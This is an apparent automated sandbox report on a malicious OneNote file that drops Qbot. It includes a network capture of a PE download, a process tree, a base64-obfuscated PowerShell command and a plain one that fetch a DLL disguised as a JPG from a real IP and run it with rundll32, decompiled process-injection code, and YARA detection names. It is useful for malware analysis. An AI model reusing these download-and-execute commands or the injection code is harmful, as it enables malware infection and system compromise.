Feb 7, 2023 20:02:06.803889990 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.803925991 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803980112 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.804029942 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.804203987 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.804203987 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.849102020 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.893481970 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:06:00.390199900 CET	49835	443	192.168.11.20	197.0.104.172
Feb 7, 2023 20:06:00.390243053 CET	443	49835	197.0.104.172	192.168.11.20
Feb 7, 2023 20:06:00.390435934 CET	49835	443	192.168.11.20	197.0.104.172
Feb 7, 2023 20:06:00.390628099 CET	49835	443	192.168.11.20	197.0.104.172
Feb 7, 2023 20:06:00.390650988 CET	443	49835	197.0.104.172	192.168.11.20

HTTP Request Dependency Graph

87.236.146.31

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49801	87.236.146.31	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:06.401859045 CET	665	OUT	GET /38199.dat HTTP/1.1 Host: 87.236.146.31 Connection: Keep-Alive
Feb 7, 2023 20:02:06.577481985 CET	666	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Feb 2023 19:02:06 GMT Content-Type: application/octet-stream Content-Length: 424448 Connection: keep-alive Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 1f 00 20 03 00 00 c8 04 00 00 04 00 00 80 13 00 00 00 10 00 00 00 30 03 00 00 00 34 69 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 79 6d 07 00 03 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 04 00 35 06 00 00 00 e0 04 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 5c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec ae 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e1 04 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 1f 03 00 00 10 00 00 00 20 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 00 00 00 00 30 03 00 00 02 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 1c 75 01 00 00 40 03 00 00 76 01 00 00 26 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 ac 03 00 00 00 c0 04 00 00 00 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 35 06 00 00 00 d0 04 00 00 08 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 80 05 00 00 00 e0 04 00 00 06 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 04 00 00 02 00 00 00 aa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 76 aa 01 00 00 00 05 00 00 b0 01 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 5c 1d 00 00 00 b0 06 00 00 1e 00 00 00 5c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL# 04iym@ 5\.text4 `P`.data0$@`.rdatau@v&@`@.bss`.edata5@0@.idata@0.CRT,@0.tlsv@0.reloc\\@0B
Feb 7, 2023 20:02:06.577510118 CET	667	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 ec 1c c7 04 24 00 c0 38 69 e8 01 1d 03 00 83 c4 1c c3 8d b4 26 00 00 00 00 8d b6 00 00 00 00 57 56 53 83 ec 10 8b 44 24 24 85 c0 75 72 8b 15 0c c0 38 69 85 d2 7e 57 83 ea 01 31 ff be 01 00 00 Data Ascii: $8i&WVSD$$ur8i~W18i$<8i58iu8i$~[^_&d1X=<8it&9$8iu
Feb 7, 2023 20:02:06.577533007 CET	669	IN	Data Raw: 00 53 5e f7 f6 66 3b c0 74 a6 bb 10 00 00 00 03 e3 bb 00 00 00 00 e9 9a 00 00 00 8b 4d f8 03 48 04 89 4d dc 3a db 74 27 89 45 e4 bb 00 00 00 00 21 5d f8 3a ff 74 3b 03 48 08 89 4d d4 8b 45 fc 66 3b e4 74 d6 55 8b ec 83 ec 50 3a c0 74 09 8b 75 dc Data Ascii: S^f;tMHM:t'E!]:t;HMEf;tUP:tu})VWf;tPuEE:tEEM:t3_uU}t!]rE@fELEE}sEuuU
Feb 7, 2023 20:02:06.577553034 CET	670	IN	Data Raw: 00 00 25 00 f0 03 00 09 c2 8b 45 f8 83 c0 02 0f b6 00 0f b6 c0 c1 e0 06 25 c0 0f 00 00 09 c2 8b 45 f8 83 c0 03 0f b6 00 0f b6 c0 83 e0 3f 09 d0 89 45 f4 83 45 f8 04 eb 7a 8b 45 f4 c1 e0 1e 25 00 00 00 40 89 c2 8b 45 f8 0f b6 00 0f b6 c0 c1 e0 18 Data Ascii: %E%E?EEzE%@E%?E%E%E%E?EEm}uE}/}zE0@7iE}
Feb 7, 2023 20:02:06.577574015 CET	671	IN	Data Raw: 39 76 e2 8b 45 10 c7 00 3d 00 00 00 e9 93 04 00 00 83 7d dc 07 7e 08 8b 45 dc 3b 45 14 7f 0d 8b 45 dc f7 d8 89 45 f0 e9 78 04 00 00 8b 45 cc 89 45 f8 8b 45 f8 0f b6 00 0f b6 c0 89 45 f4 83 7d f4 37 0f 87 4f 04 00 00 83 6d f4 30 eb 1f 8b 45 f4 8d Data Ascii: 9vE=}~E;EEExEEEE}7Om0EEE0EEPUE</vE<7v}}E3E<{tEQE<}uEVE
Feb 7, 2023 20:02:06.577594995 CET	672	IN	Data Raw: c3 55 89 e5 83 ec 58 8b 45 08 8b 00 89 45 e4 83 45 e4 01 8b 45 e4 0f b6 00 88 45 f7 80 7d f7 00 0f 84 60 01 00 00 8b 45 0c c7 00 00 00 00 00 80 7d f7 7b 75 72 8b 45 e4 83 c0 01 0f b6 00 3c 5e 75 0d 8b 45 0c c7 00 01 00 00 00 83 45 e4 01 c7 45 f0 Data Ascii: UXEEEEE}`E}{urE<^uEEE/EEE}}}tUEEE}~}}UEEEEEUEX7iEUEEU`7i@
Feb 7, 2023 20:02:06.577613115 CET	673	IN	Data Raw: 18 89 45 dc 8b 45 e4 89 45 e0 8b 45 e4 8d 50 02 8d 45 dc 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 89 14 24 e8 2f fe ff ff 89 45 e8 83 7d e8 00 79 08 8b 45 e8 e9 23 02 00 00 8b 45 e8 01 f0 89 c6 83 c3 03 e9 0f 02 Data Ascii: EEEEPED$ED$ED$ED$$/E}yE#ECC<wtC7i7i}C<C?@7ii
Feb 7, 2023 20:02:06.577632904 CET	674	IN	Data Raw: 69 ff e0 b8 ff ff ff ff eb 7d 8d 43 01 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8d 43 02 0f b6 00 0f b6 c0 09 c2 8d 43 03 0f b6 00 0f b6 c0 c1 e0 08 89 c1 8d 43 04 0f b6 00 0f b6 c0 09 c8 39 c2 74 07 b8 ff ff ff ff eb 40 8d 43 01 0f b6 00 0f b6 c0 c1 e0 Data Ascii: i}CCCC9t@CC@[^]USEunpu$EEE\|u }yE27i
Feb 7, 2023 20:02:06.577653885 CET	676	IN	Data Raw: 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 8b 45 f0 89 04 24 e8 11 fe ff ff 85 c0 74 09 c7 45 e8 01 00 00 00 eb 2c 8b 45 f0 83 c0 01 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 45 f0 83 c0 02 0f b6 00 0f b6 c0 09 d0 01 45 f0 8b 45 f0 0f b6 00 3c Data Ascii: D$ED$ED$E$tE,EEEE<wt}stttuG7iEEEEE<wtEtttu7EE
Feb 7, 2023 20:02:06.599071026 CET	677	IN	Data Raw: 20 c7 37 69 0f b7 c0 c1 e0 03 05 a0 8e 37 69 89 45 f8 83 7d 0c 09 0f 87 36 02 00 00 8b 45 0c c1 e0 02 05 9c 5d 37 69 8b 00 ff e0 8b 45 f8 0f b6 40 01 3c 09 74 16 8b 45 f8 0f b6 40 01 3c 05 74 0b 8b 45 f8 0f b6 40 01 3c 08 75 07 b8 01 00 00 00 eb Data Ascii: 7i7iE}6E]7iE@<tE@<tE@<u;EE@7i9E9EE@9E9EE9E9EE@7itE@
Feb 7, 2023 20:02:06.599098921 CET	678	IN	Data Raw: 0f b6 c0 c1 e0 18 25 00 00 00 3f 09 c2 8b 45 08 83 c0 01 0f b6 00 0f b6 c0 c1 e0 12 25 00 00 fc 00 09 c2 8b 45 08 83 c0 02 0f b6 00 0f b6 c0 c1 e0 0c 25 00 f0 03 00 09 c2 8b 45 08 83 c0 03 0f b6 00 0f b6 c0 c1 e0 06 25 c0 0f 00 00 09 c2 8b 45 08 Data Ascii: %?E%E%E%E?EEEPEEEA}uEEPUE}}E u)E%EPU?E

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ONENOTE.EXEPID: 6420, Parent PID: 4636

General

Target ID:	0
Start time:	20:01:59
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Funds_160151.one
Imagebase:	0x7ff6a88a0000
File size:	2383176 bytes
MD5 hash:	59056F600C4366EE07277C20A90DAF67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 5280, Parent PID: 6420

General

Target ID:	5
Start time:	20:02:00
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
Wow64 process (32bit):	false
Commandline:	/tsr
Imagebase:	0x7ff6b6d90000
File size:	180528 bytes
MD5 hash:	377069572D48FFBF1EA2DA466A61B398
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 376, Parent PID: 4636

General

Target ID:	7
Start time:	20:02:02
Start date:	07/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Imagebase:	0x7ff726610000
File size:	289792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 384, Parent PID: 376

General

Target ID:	8
Start time:	20:02:02
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff76a5a0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7132, Parent PID: 376

General

Target ID:	9
Start time:	20:02:02
Start date:	07/02/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))
Imagebase:	0x7ff75a040000
File size:	452608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.2654006199.0000021A0CABF000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1868, Parent PID: 376

General

Target ID:	11
Start time:	20:02:04
Start date:	07/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd
Imagebase:	0x7ff726610000
File size:	289792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4528, Parent PID: 1868

General

Target ID:	12
Start time:	20:02:04
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff76a5a0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7252, Parent PID: 1868

General

Target ID:	13
Start time:	20:02:05
Start date:	07/02/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
Imagebase:	0x7ff75a040000
File size:	452608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4180, Parent PID: 1868

General

Target ID:	14
Start time:	20:02:06
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\programdata\gb.jpg,Wind
Imagebase:	0x7ff724220000
File size:	71680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4260, Parent PID: 4180

General

Target ID:	15
Start time:	20:02:06
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 C:\programdata\gb.jpg,Wind
Imagebase:	0xb50000
File size:	61440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000F.00000002.2709522277.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: backgroundTaskHost.exePID: 3124, Parent PID: 4260

General

Target ID:	16
Start time:	20:02:08
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\backgroundTaskHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\backgroundTaskHost.exe
Imagebase:	0xe60000
File size:	17728 bytes
MD5 hash:	F290D12F0351B56708B3DF1EC26CB45B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 7188, Parent PID: 4636

General

Target ID:	17
Start time:	20:02:13
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
Imagebase:	0x7ff6b6d90000
File size:	180528 bytes
MD5 hash:	377069572D48FFBF1EA2DA466A61B398
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 4260, Parent PID: 4180COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	90.8%
Signature Coverage:	27.6%
Total number of Nodes:	402
Total number of Limit Nodes:	5

Executed Functions

Function 1000A4A8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 219
nativeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000A4A8(void* __ecx, intOrPtr __edx) {
				char _v6;
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				long _v32;
				intOrPtr _v36;
				void* _v37;
				intOrPtr _v40;
				char _v44;
				short _v52;
				long _v56;
				void* _v60;
				struct _WNDCLASSEXA _v108;
				void* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				char _t98;
				intOrPtr _t100;
				intOrPtr _t105;
				long _t107;
				char _t112;
				void* _t119;
				char _t120;
				void* _t124;
				struct HWND__* _t133;
				void* _t139;
				void* _t148;
				intOrPtr* _t154;
				intOrPtr _t157;
				void* _t158;
				void* _t162;
				void* _t164;

				_t83 =  *0x10020d88; // 0x4a5fc98
				_t139 = 0;
				_v16 = __ecx;
				_t157 = __edx;
				_v24 = 0;
				_v60 = 0;
				_v56 = 0;
				_v20 = 0;
				_v12 = 0;
				_v28 = 0;
				_v36 = __edx;
				if(( *(_t83 + 0x1898) & 0x00000040) != 0) {
					E1000E9DF(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x108
				_t154 =  *_t12 + _t157;
				_v32 = _t139;
				if( *_t154 != 0x4550) {
					L14:
					_t158 = _v16;
					L15:
					if(_v12 != _t139) {
						_t90 =  *0x10020e70; // 0x4a61868
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v12);
						_v12 = _t139;
					}
					L17:
					if(_v20 != 0) {
						_t87 =  *0x10020d58; // 0x4a5f900
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x130))(), _v20);
					}
					if(_v24 != 0) {
						NtClose(_v24);
					}
					return _v12;
				}
				_v60 =  *((intOrPtr*)(_t154 + 0x50));
				if(NtCreateSection( &_v24, 0xe, _t139,  &_v60, 0x40, 0x8000000, _t139) < 0) {
					goto L14;
				}
				_t97 =  *((intOrPtr*)("15")); // 0x3531
				_v8 = _t97;
				_t98 =  *0x1001dee2; // 0x0
				_v6 = _t98;
				_v108.lpszClassName =  &_v44;
				_t100 = __imp__DefWindowProcW; // 0x776a7d30
				_v108.lpfnWndProc = _t100;
				_v44 = 0x74636573;
				_v40 = 0x6e6f69;
				_v108.cbWndExtra = _t139;
				_v108.style = 0xb;
				_v108.lpszMenuName = _t139;
				_v108.cbSize = 0x30;
				_v108.cbClsExtra = _t139;
				_v108.hInstance = _t139;
				if(RegisterClassExA( &_v108) != 0) {
					_t34 =  &_v44; // 0x74636573
					_t133 = CreateWindowExA(_t139, _t34,  &_v8, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t139, _t139, _t139, _t139); // executed
					if(_t133 != 0) {
						DestroyWindow(_t133); // executed
						_t35 =  &_v44; // 0x74636573
						UnregisterClassA(_t35, _t139);
					}
				}
				_t105 =  *0x10020d58; // 0x4a5f900
				_t107 = NtMapViewOfSection(_v24,  *((intOrPtr*)(_t105 + 0x130))(),  &_v20, _t139, _t139, _t139,  &_v28, 2, _t139, 0x40);
				_t158 = _v16;
				if(_t107 < 0 || NtMapViewOfSection(_v24, _t158,  &_v12, _t139, _t139, _t139,  &_v28, 2, _t139, 0x40) < 0) {
					goto L15;
				} else {
					_t112 = E1000958A( *0x10020d88, 0x1ac4);
					_v8 = _t112;
					if(_t112 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t112 + 0x224)) = _v12;
					_t162 = VirtualAllocEx(_t158, _t139, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v16, _t162, _v8, 0x1ac4,  &_v32);
					E1000953B( &_v8, 0x1ac4);
					_t119 =  *0x10020d60; // 0x10000000
					_v16 = _t119;
					_t120 =  *0x10020d88; // 0x4a5fc98
					 *0x10020d88 = _t162;
					_v8 = _t120;
					 *0x10020d60 = _v12;
					E10009602(_v20, _v36,  *((intOrPtr*)(_t154 + 0x50)));
					E1000A427(_v20, _v12, _v36);
					_t124 = E1000D389("Jjischug");
					_v37 = _t139;
					_t148 = 0xf;
					if(_t124 > _t148) {
						do {
							L12:
							_t64 = _t139 + 0x41; // 0x41
							 *((char*)(_t164 + _t139 - 0x30)) = _t64;
							_t139 = _t139 + 1;
						} while (_t139 < _t148);
						L13:
						lstrlenW( &_v52);
						 *0x10020d60 = _v16;
						 *0x10020d88 = _v8;
						goto L17;
					}
					_t148 = _t124;
					if(_t148 == 0) {
						goto L13;
					}
					goto L12;
				}
			}

0x1000a4ae
0x1000a4b4
0x1000a4b6
0x1000a4ba
0x1000a4bc
0x1000a4bf
0x1000a4c2
0x1000a4c5
0x1000a4c8
0x1000a4cb
0x1000a4d6
0x1000a4d9
0x1000a4e0
0x1000a4e0
0x1000a4e5
0x1000a4e8
0x1000a4ea
0x1000a4f3
0x1000a6f0
0x1000a6f0
0x1000a6f3
0x1000a6f6
0x1000a6fb
0x1000a701
0x1000a704
0x1000a704
0x1000a707
0x1000a70b
0x1000a70d
0x1000a722
0x1000a722
0x1000a72c
0x1000a736
0x1000a736
0x1000a73d
0x1000a73d
0x1000a502
0x1000a51c
0x00000000
0x00000000
0x1000a522
0x1000a528
0x1000a52c
0x1000a531
0x1000a537
0x1000a53a
0x1000a53f
0x1000a546
0x1000a54d
0x1000a554
0x1000a557
0x1000a55e
0x1000a561
0x1000a568
0x1000a56b
0x1000a577
0x1000a594
0x1000a599
0x1000a5a1
0x1000a5a4
0x1000a5ab
0x1000a5af
0x1000a5af
0x1000a5a1
0x1000a5cb
0x1000a5da
0x1000a5dd
0x1000a5e2
0x00000000
0x1000a60c
0x1000a617
0x1000a61c
0x1000a623
0x00000000
0x00000000
0x1000a638
0x1000a64b
0x1000a661
0x1000a66d
0x1000a672
0x1000a677
0x1000a67a
0x1000a67f
0x1000a68f
0x1000a695
0x1000a69a
0x1000a6a6
0x1000a6b0
0x1000a6b8
0x1000a6bd
0x1000a6c0
0x1000a6c8
0x1000a6c8
0x1000a6c8
0x1000a6cb
0x1000a6cf
0x1000a6d0
0x1000a6d4
0x1000a6d8
0x1000a6e1
0x1000a6e9
0x00000000
0x1000a6e9
0x1000a6c2
0x1000a6c6
0x00000000
0x00000000
0x00000000
0x1000a6c6

APIs

NtCreateSection.E77242D6(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 1000A517
RegisterClassExA.USER32(?), ref: 1000A56E
CreateWindowExA.USER32(00000000,section,00000001,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 1000A599
DestroyWindow.USER32(00000000), ref: 1000A5A4
UnregisterClassA.USER32(section,00000000), ref: 1000A5AF
NtMapViewOfSection.E77242D6(?,00000000), ref: 1000A5DA
NtMapViewOfSection.E77242D6(?,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000A601
VirtualAllocEx.KERNELBASE(?,00000000,00001AC4,00001000,00000004), ref: 1000A645
WriteProcessMemory.KERNELBASE(?,00000000,00000001,00001AC4,?), ref: 1000A661

Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 1000A6D8
NtUnmapViewOfSection.E77242D6(00000000), ref: 1000A722
NtClose.E77242D6(00000000), ref: 1000A736

Strings

Jjischug, xrefs: 1000A6AB
0, xrefs: 1000A561
0}jw, xrefs: 1000A53A
section, xrefs: 1000A594, 1000A597

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
String ID: 0$0}jw$Jjischug$section
API String ID: 494031690-3910236586
Opcode ID: 9a737af273db41b1fde892004d7383aa949273c8ddf4d36099d85bddc829d53d
Instruction ID: b5f4344525c8211231c04cd401d06040389fe4c66827731468beb840fcedfec4
Opcode Fuzzy Hash: 9a737af273db41b1fde892004d7383aa949273c8ddf4d36099d85bddc829d53d
Instruction Fuzzy Hash: 8D8118B5A01219EFEB00DFD4CC84AEEBBB9FF09344F14416AF505A7261D771AA81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B231 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E1000B231(void* __edx, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				void* _t75;
				intOrPtr _t76;
				intOrPtr* _t78;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t95;
				void* _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				short _t108;
				char _t110;
				intOrPtr _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t125;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t140;
				intOrPtr _t143;
				intOrPtr _t145;
